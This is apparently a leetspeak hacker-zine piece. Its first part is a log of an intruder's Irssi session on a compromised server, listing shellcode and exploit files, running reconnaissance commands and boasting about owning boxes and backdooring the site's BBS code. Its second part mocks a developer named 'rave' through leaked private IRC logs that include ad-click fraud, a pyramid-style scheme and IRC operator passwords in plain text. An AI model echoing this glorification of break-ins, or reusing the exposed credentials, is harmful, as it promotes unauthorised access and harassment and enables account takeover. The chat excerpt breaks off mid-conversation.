14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh3.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh_cmd.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/fbsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/freebsd.23-bytes-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/hp-ux/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/bindsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-mips-bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-etc-passwd.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-motd.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/connect-read-exec-63-byte/bind_for_connect-read-exec-63-byte.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c~
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh1.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh1.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind
14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/ppc/bsd-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/ppc/linux-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/bindshell.txt
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbind.c
14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/win/w00w00-bindshell.c
14:32 /home/publisher/bin14:32 /home/publisher/bin/bbs_audits_a
14:32 /home/publisher/bin/bbs_audits_p14:32 /home/publisher/bin/bbs_audits_s
14:32 /home/publisher/bin/bbs_bb_a
14:32 /home/publisher/bin/bbs_bb_p
14:32 /home/publisher/bin/bbs_bb_s
14:32 /home/publisher/bin/bbs_bytecode_a
14:32 /home/publisher/bin/bbs_bytecode_p
14:32 /home/publisher/bin/bbs_bytecode_s
14:32 /home/publisher/bin/bbs_chat
14:32 /home/publisher/bin/bbs_exploits_a
14:32 /home/publisher/bin/bbs_exploits_p
14:32 /home/publisher/bin/bbs_exploits_s
14:32 /home/publisher/bin/bbs_options_c
14:32 /home/publisher/bin/bbs_papers_a
14:32 /home/publisher/bin/bbs_papers_p
14:32 /home/publisher/bin/bbs_papers_s
14:32 /home/publisher/bin/bbs_snipplets_a
14:32 /home/publisher/bin/bbs_snipplets_p
14:32 /home/publisher/bin/bbs_snipplets_s
14:32 /home/publisher/bin/bbs_tools_a
14:32 /home/publisher/bin/bbs_tools_p
14:32 /home/publisher/bin/bbs_tools_s
14:32 /home/publisher/bin/bbs_whois
14:32 /home/sirphreak/0x80/x80/src/mod/gseen.mod/generic_binary_tree.c
14:32 /home/sirphreak/x80/eggdrop1.6.16/src/mod/gseen.mod/generic_binary_tree.c
14:32 /home/posidron/code/admiral/database
14:32 /home/posidron/code/admiral/database/db_debian
14:32 /home/posidron/code/admiral/database/db_frsirt
14:32 /home/posidron/code/admiral/include/database.h
14:32 /home/posidron/code/admiral/src/database.c
14:32 /home/posidron/code/admiral/src/database.c.save
14:32 /home/posidron/code/admiral/src/database.c.save.1
14:32 /home/posidron/code/backup/database
14:32 /home/posidr
on/code/backup/include/database.h
14:32 /home/posidron/code/backup/src/database.c
14:32 /home/publisher/database
14:32 /home/publisher/database/audits
14:32 /home/publisher/database/audits/serial
14:32 /home/publisher/database/blackboard
14:32 /home/publisher/database/blackboard/serial
14:32 /home/publisher/database/bytecode
14:32 /home/publisher/database/bytecode/serial
14:32 /home/publisher/database/exploits
14:32 /home/publisher/database/exploits/serial
14:32 /home/publisher/database/papers
14:32 /home/publisher/database/papers/serial
14:32 /home/publisher/database/snipplets
14:32 /home/publisher/database/snipplets/0
14:32 /home/publisher/database/snipplets/1
14:32 /home/publisher/database/snipplets/serial
14:32 /home/publisher/database/tools
14:32 /home/publisher/database/tools/serial
14:32 /home/setnf/pfprintd-0.5/src/database.c
14:32 /home/publisher
14:32 /home/publisher/.bash_history
14:32 /home/publisher/.irssi
14:32 /home/publisher/.irssi/config
14:32 /home/publisher/ansi
14:32 /home/publisher/ansi/audits.menu
14:32 /home/publisher/ansi/blackboard.menu
14:32 /home/publisher/ansi/bytecode.menu
14:32 /home/publisher/ansi/exploits.menu
14:32 /home/publisher/ansi/main.menu
14:32 /home/publisher/ansi/options.menu
14:32 /home/publisher/ansi/papers.menu
14:32 /home/publisher/ansi/snipplets.menu
14:32 /home/publisher/ansi/tools.menu
14:32 /home/publisher/ascii
14:32 /home/publisher/ascii/audits.menu
14:32 /home/publisher/ascii/bytecode.menu
14:32 /home/publisher/ascii/exploits.menu
14:32 /home/publisher/ascii/main.menu
14:32 /home/publisher/ascii/options.menu
14:32 /home/publisher/ascii/papers.menu
14:32 /home/publisher/ascii/snipplets.menu
14:32 /home/publisher/ascii/tools.menu
14:32 /home/publisher/bin
14:32 /home/publisher/bin/bbs_audits_a
14:32 /home/publisher/bin/bbs_audits_p
14:32 /home/publisher/bin/bbs_audits_s
14:32 /home/publisher/bin/bbs_bb_a
14:32 /home/publisher/bin/bbs_bb_p
14:32 /home/publisher/bin/bbs_bb_s
14:32 /home/publisher/bin/bbs_bytecode_a
14:32 /home/publisher/bin/bbs_bytecode_p
14:32 /home/publisher/bin/bbs_bytecode_s
14:32 /home/publisher/bin/bbs_chat
14:32 /home/publisher/bin/bbs_exploits_a
14:32 /home/publisher/bin/bbs_exploits_p
14:32 /home/publisher/bin/bbs_exploits_s
14:32 /home/publisher/bin/bbs_options_c
14:32 /home/publisher/bin/bbs_papers_a
14:32 /home/publisher/bin/bbs_papers_p
14:32 /home/publisher/bin/bbs_papers_s
14:32 /home/publisher/bin/bbs_snipplets_a
14:32 /home/publisher/bin/bbs_snipplets_p
14:32 /home/publisher/bin/bbs_snipplets_s
14:32 /home/publisher/bin/bbs_tools_a
14:32 /home/publisher/bin/bbs_tools_p
14:32 /home/publisher/bin/bbs_tools_s
14:32 /home/publisher/bin/bbs_whois
14:32 /home/publisher/database
14:32 /home/publisher/database/audits
14:32 /home/publisher/database/audits/serial
14:32 /home/publisher/database/blackboard
14:32 /home/publisher/database/blackboard/serial
14:32 /home/publisher/database/bytecode
14:32 /home/publisher/database/bytecode/serial
14:32 /home/publisher/database/exploits
14:32 /home/publisher/database/exploits/serial
14:32 /home/publisher/database/papers
14:32 /home/publisher/database/papers/serial
14:32 /home/publisher/database/snipplets
14:32 /home/publisher/database/snipplets/0
14:32 /home/publisher/database/snipplets/1
14:32 /home/publisher/database/snipplets/serial
14:32 /home/publisher/database/tools
14:32 /home/publisher/database/tools/serial
14:32 /home/publisher/publisher
14:32 /home/publisher/scripts
14:32 /home/publisher/scripts/audits.menu
14:32 /home/publisher/scripts/blackboard.menu
14:32 /home/publisher/scripts/bytecode.menu
14:32 /home/publisher/scripts/exploits.menu
14:32 /home/publisher/scripts/main.menu
14:32 /home/publisher/scripts/options.menu
14:32 /home/publisher/scripts/papers.menu
14:32 /home/publisher/scripts/snipplets.menu
14:32 /home/publisher/scripts/tools.menu
14:32 /home/phyro/eggdrop/scripts
14:32 /home/phyro/eggdrop/scripts/action.fix.tcl
14:32 /home/phyro/eggdrop/scripts/alltools.tcl
14:32 /home/phyro/eggdrop/scripts/autobotchk
14:32 /home/phyro/eggdrop/scripts/botchk
14:32 /home/phyro/eggdrop/scripts/cmd_resolve.tcl
14:32 /home/phyro/eggdrop/scripts/compat.tcl
14:32 /home/phyro/eggdrop/scripts/CONTENTS
14:32 /home/phyro/eggdrop/scripts/getops.tcl
14:32 /home/phyro/eggdrop/scripts/klined.tcl
14:32 /home/phyro/eggdrop/scripts/notes2.tcl
14:32 /home/phyro/eggdrop/scripts/ques5.tcl
14:32 /home/phyro/eggdrop/scripts/sentinel.tcl
14:32 /home/phyro/eggdrop/scripts/userinfo.tcl
14:32 /home/phyro/eggdrop/scripts/weed
14:32 /home/phyro/installed/phyro/scripts
14:32 /home/phyro/installed/phyro/scripts/action.fix.tcl
14:32 /home/phyro/installed/phyro/scripts/alltools.tcl
14:32 /home/phyro/installed/phyro/scripts/autobotchk
14:32 /home/phyro/installed/phyro/scripts/botchk
14:32 /home/phyro/installed/phyro/scripts/cmd_resolve.tcl
14:32 /home/phyro/installed/phyro/scripts/compat.tcl
14:32 /home/phyro/installed/phyro/scripts/CONTENTS
14:32 /home/phyro/installed/phyro/scripts/getops.tcl
14:32 /home/phyro/installed/phyro/scripts/help
14:32 /home/phyro/installed/phyro/scripts/help/cmd_resolve.help
14:32 /home/phyro/installed/phyro/scripts/help/msg
14:32 /home/phyro/installed/phyro/scripts/help/msg/userinfo.help
14:32 /home/phyro/installed/phyro/scripts/help/userinfo.help
14:32 /home/phyro/installed/phyro/scripts/klined.tcl
14:32 /home/phyro/installed/phyro/scripts/Makefile
14:32 /home/phyro/installed/phyro/scripts/Makefile.in
14:32 /home/phyro/installed/phyro/scripts/notes2.tcl
14:32 /home/phyro/installed/phyro/scripts/ques5.tcl
14:32 /home/phyro/installed/phyro/scripts/sentinel.tcl
14:32 /home/phyro/installed/phyro/scripts/userinfo.tcl
14:32 /home/phyro/installed/phyro/scripts/weed
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-cups.in
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-init.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/compile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.guess
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.rpath
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.sub
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/depcomp
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/elisp-comp
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/generr.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-doc-snarf
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-func-name-check
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-snarf.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/install-sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ltmain.sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mdate-sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/missing
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mkinstalldirs
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/sqlmod.sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texify.sed
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texinfo.tex
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ylwrap
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/address.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_all.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_domain.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_local.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof00.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof01.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof11.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof00.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof01.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof11.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/discard.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/DISTFILES
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/envelope1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists3.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/false.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/fileinto.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header-mime.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header3.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-regex.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-regex.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/keep.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/mul-addr.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/not.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/null.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/numaddr.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/redirect.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/reject.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-address.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-hairy.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-header.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/stop.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/true.sv
14:32 /home/posidron/dump/scripts
14:32 /home/posidron/dump/scripts/audit_log
14:32 /home/posidron/dump/scripts/canoo.sh
14:32 /home/posidron/dump/scripts/debug.c
14:32 /home/publisher/scripts
14:32 /home/publisher/scripts/audits.menu
14:32 /home/publisher/scripts/blackboard.menu
14:32 /home/publisher/scripts/bytecode.menu
14:32 /home/publisher/scripts/exploits.menu
14:32 /home/publisher/scripts/main.menu
14:32 /home/publisher/scripts/options.menu
14:32 /home/publisher/scripts/papers.menu
14:32 /home/publisher/scripts/snipplets.menu
14:32 /home/publisher/scripts/tools.menu
14:32 /home/sirphreak/0x80/x80/scripts
14:32 /home/sirphreak/0x80/x80/scripts/action.fix.tcl
14:32 /home/sirphreak/0x80/x80/scripts/alltools.tcl
14:32 /home/sirphreak/0x80/
14:32 -!- Irssi: process 0 (locate * |grep home) terminated with return
code 0
4lL th1z 1s 0K bu7 3yez w4ntz 0hd4yz!!!
[14:33]/exec locate exploit|grep -v home
14:33 /root/temp/trapdown/include/exploits.h
14:33 /root/temp/trapdown/include/info_exploits.h
14:33 /root/temp/trapdown/include/show_exploits.h
14:33 /root/temp/trapdown/src/info_exploits.c
14:33 /root/temp/trapdown/src/show_exploits.c
14:33 /var/www/gotfault.org/exploits
14:33 /var/www/gotfault.org/exploits/gotfault-lcdproc.c
14:33 /var/www/gotfault.org/exploits/gotfault-psoproxy.c
14:33 /var/www/nutshell.gotfault.org/exploits
14:33 /var/www/nutshell.gotfault.org/exploits/flow-as.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-bar.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-compress.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-kon.pl < W3'V3 0WN3D M4NY B0X3Z W1TH TH1Z, TH4NKZ
14:33 /var/www/nutshell.gotfault.org/exploits/flow-psoproxy.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-rh.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-slack.pl
14:33 /var/www/nutshell.gotfault.org/exploits/picasmpoc.pl
14:33 /var/www/nutshell.gotfault.org/exploits/picasmxpl.pl
14:33 /var/www/setnf.gotfault.org/exploits
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-lcdproc.c
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-pcwsd.c
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-psoproxy.c < 0MGZ TH1Z IZ 0LD!
14:33 -!- Irssi: process 0 (locate exploit|grep -v home) terminated with return
code 0
3yE f0uNdeD th3mz!!!
/exec locate /root/ | head -n5
14:33 /root/.bashrc
14:33 /root/.bash_history
14:33 /root/.BitchX
14:33 /root/.BitchX/BitchX.away
14:33 /root/.BitchX/screens
14:36 -!- Irssi: process 0 (locate /root/| head -n5) terminated with return
code 0
3yE R S331ng 4z r00t, h4r h4r h4r!!@!
/exec w
14:44 14:44:50 up 5 days, 2:53, 6 users, load average: 0.06, 0.08, 0.10
14:44 USER TTY LOGIN@ IDLE JCPU PCPU WHAT
14:44 posidron pts/6 02:45 10:26 1.49s 0.00s nano samiftpd.pl < N3W 0D4Y 1N TH3 W0RKZ!!
14:44 publishe pts/20 13:47 39.00s 2.63s 0.01s /bin/sh /home/publisher/scripts
14:44 publishe pts/23 14:28 0.00s 11.91s 0.01s /bin/sh /home/publisher/scripts
14:44 publishe pts/24 14:02 32:22 13.10s 0.01s /bin/sh /home/publisher/scripts
14:44 setnf pts/25 14:14 7:02 1.04s 1.03s irssi
14:44 setnf pts/26 14:24 13:27 0.11s 0.01s sshd: setnf [priv]
14:44 -!- Irssi: process 0 (w) terminated with return code 0
/exec echo 'h0h0h0 0wn3d 4g4iN!!'
14:46 h0h0h0 0wn3d 4g4iN!!
14:46 -!- Irssi: process 0 (echo 'h0h0h0 0wn3d 4g4iN!!') terminated with return
code 0
/quit
14:46 -!- Irssi: Disconnecting from server localhost:
[leaving]
14:46 -!- Irssi: Connection lost to localhost [] [1] B
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
| |
| ________ __ _____ .__ __ |
| / _____/ _____/ |__/ ____\____ __ __| |_/ | |
| / \ ___ / _ \ __\ __\\__ \ | | \ |\ __\ |
| \ \_\ ( <_> ) | | | / __ \| | / |_| | |
| \______ /\____/|__| | | (____ /____/|____/__| |
| \/ | | \/ |
| | | |
| <A>udits | | <C>chat|
| <T>oolbox | | <B>lackboard|
| <P>apers | | <O>ptions|
| <E>xploits | | <W>ho's Online |
| <S>nipplets |__| <L>ogout |
| |
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
gotfault> L
/*
wh3nZ 3yEz c0nn3c73d l4t3rZ th3y 5p0tt3d m3 4nd k1lled M3ye 5ess1on
wh1l3z 1 wUz b4ckd00r1nG 7h3ir BBS c0d3 :(((
*/
08.txt -~-~-~ N3V3R 0WN3D!
h0no h4z c0mp1l3d a s3r13z 0f 1rc l0gz pr0f1l1ng th3 s3lf 1d3nt1f13d "cr34t0r 0f th3
w0rldz m0zt s3cur3 ftpd". th3 r4v3 vs jedi/sector one b4ttl3 1z h34t1ng up.. w4tch 0ut
jedi/sector one, h0no muzt s33 1f r4v3'z cl41mz h0ldz tru3 (t4k3 th1z 4z a thr34t).
-~-~-~
NEVER HACKED
Sep 03 22:41:58 rave i wasnt hacked by security
Sep 03 22:42:11 rave i was in contact with the once who hacked me
Sep 03 22:42:28 rave hold ur self now
Sep 03 22:42:33 rave they rooted humpmeg
Sep 03 22:42:51 rave and then acted like the_mytstic
Sep 03 22:43:02 rave and when i requested for help
Sep 03 22:43:07 rave it was the hacker
Sep 03 22:43:15 rave and so they gained my root password
Sep 03 22:43:27 rave they had root for 3 months already
Sep 03 22:43:28 mite damn that sucks.
Sep 03 22:43:49 rave yes
Sep 03 22:43:58 rave because my security got blamed
Sep 03 22:44:07 rave and thats prob why you delinked
Sep 03 22:44:14 mite yes it was
Sep 03 22:44:19 rave i was never hacked
Sep 03 22:44:23 rave i mean realy hacked
Sep 21 23:42:19 rave my software is only exploited once
Sep 21 23:42:27 techie hehe
Sep 21 23:42:33 rave and that wasnt even in a release
Sep 21 23:42:36 rave so basicly
Sep 21 23:42:44 rave vsftpd and me are on the same level
Sep 21 23:42:47 rave NEVER OWNED
Sep 21 23:42:51 rave and hacked
-~-~-~
GREAT IDEA... IDIOT
Sep 16 01:20:13 rave okey
Sep 16 01:20:23 rave i have this new thing on my daemon
Sep 16 01:20:24 Strokerace ok, what
Sep 16 01:20:31 rave tell me what you think
Sep 16 01:20:50 rave if the credit in payal is 200+ we pay hackers for there hacks
Sep 16 01:21:11 rave and in the mean while they have to tell others to donate to my project so they can urn money
Sep 16 01:21:15 rave while they hack it
Sep 16 01:21:29 rave i payed dreamcatcher already
Sep 16 01:21:31 Strokerace hmm
Sep 16 01:21:36 rave what do you think
Sep 16 01:22:01 rave its a clever piramit game dont you think ??
Sep 16 01:22:43 rave 200+ that enough to pay ur developers as well
Sep 16 01:23:32 Strokerace yes, it does sound like a good idea
Sep 16 01:23:46 rave you should do it for edge as well
Sep 16 01:23:46 Strokerace as long as there is more money coming in then going out
Sep 16 01:24:02 rave no not realy
Sep 16 01:24:11 rave because making money comes automaticly
Sep 16 01:24:17 rave the hackers want money
Sep 16 01:24:25 rave so they ask everyone to donate
Sep 16 01:24:32 rave so it comes automaticly
Sep 16 01:24:51 Strokerace yes, that is true
Sep 16 01:25:04 rave its a piramid game
Sep 16 01:25:14 rave use it for edge !!
Sep 16 01:25:24 rave gain money by donating
Sep 16 01:25:29 Strokerace yes, but even the best thought out ones can fail
Sep 16 01:25:31 rave thats ur slogan to use
Sep 16 01:25:52 rave how do you see this fail ??
Sep 16 01:25:58 rave if al they hackers
Sep 16 01:26:10 rave want to make money they all get some one to pay
Sep 16 01:26:23 rave so soon we will be @ 500++
Sep 16 01:26:35 Strokerace what if the money stops coming in
Sep 16 01:26:38 rave and @ 200 we say
Sep 16 01:26:44 rave sorry there is no more 200++
Sep 16 01:26:52 rave then we dont pay
Sep 16 01:26:55 rave simple
Sep 16 01:27:05 rave they want money ??
Sep 16 01:27:09 rave they can have it
Sep 16 01:27:11 Strokerace as long as they all know
Sep 16 01:27:23 rave i have tons of contacts
Sep 16 01:27:47 rave i can advertice for free over more then 100+ very know security sites
Sep 16 01:27:56 rave like i dont know if you know it
Sep 16 01:28:00 rave packet storm
Sep 16 01:28:01 rave and
Sep 16 01:28:07 rave alstalavista
Sep 16 01:28:12 rave and blacksun
Sep 16 01:28:20 rave rosiello
Sep 16 01:28:25 rave .org that is
Sep 16 01:28:39 rave amd any NL lug group
Sep 16 01:28:46 Strokerace hmm
Sep 16 01:28:47 rave and in american
Sep 16 01:28:55 rave and canada
Sep 16 01:29:16 rave aldo we have a few chat members
Sep 16 01:29:21 rave rosiello as it is
Sep 16 01:29:25 rave is huge
Sep 16 01:29:51 rave with all of our contact used @ once
Sep 16 01:30:07 rave we could make edge bigger then phpnuke or postnuke
-~-~-~
MORON
Oct 18 22:04:37 rave can you click my adds again ? btw i google droped me because of abuse
Oct 18 22:04:49 rave i lost all of my money i made
Oct 18 22:04:54 rave $80++
Oct 18 22:20:47 link :|
Oct 18 22:20:49 link abuse?
Oct 18 22:21:55 link done
Oct 18 22:33:46 rave ty
Oct 18 22:33:51 rave yes i clicked my own adds :)
-~-~-~
THE SCENE (wh4t 4b0ut dt0rz?!??)
Sep 16 02:55:56 rave sorry to say kid now
Sep 16 02:56:04 rave but you dont know my history
Sep 16 02:56:08 rave rosiello
Sep 16 02:56:13 rave blacksun
Sep 16 02:56:18 rave packetstorm
Sep 16 02:56:26 rave and phrack
Sep 16 02:56:29 rave used to be 1
Sep 16 02:56:38 rave 1 underground crew
-~-~-~
ALIAS H0NO`YOU`ARE`FUCKED /nick cold;/oper cold FDKMP-Q66H-3D26KY
Oct 15 23:55:58 cold what did you put my pass as?
Oct 15 23:56:28 rave FDKMP-Q66H-3D26KY
Oct 15 23:56:39 rave user cold
Oct 15 23:56:50 cold k
Oct 15 23:57:01 cold so its /oper <nick> <pass>?
Sep 03 10:09:57 _Nemesis_ br0
Sep 03 10:10:00 _Nemesis_ =)
Sep 03 10:10:37 _Nemesis_ use for my O-Line nick nemesis pass gabriel
Sep 03 10:10:43 _Nemesis_ when u set it
-~-~-~
Sep 04 11:12:10 angelo man
Sep 04 11:12:16 angelo this a security thing
Sep 04 11:12:16 rave yes ?
Sep 04 11:12:17 angelo well
Sep 04 11:12:24 angelo you are logging things
Sep 04 11:12:27 angelo in the logs
Sep 04 11:12:31 angelo isn't it?
Sep 04 11:13:01 angelo now... suppose an hacker fuck the system and uses ftpd
Sep 04 11:13:06 angelo or even hack the system by ftpd
Sep 04 11:13:12 angelo are u following me?
Sep 04 11:13:20 rave yes i get what you mean
Sep 04 11:13:42 angelo now...
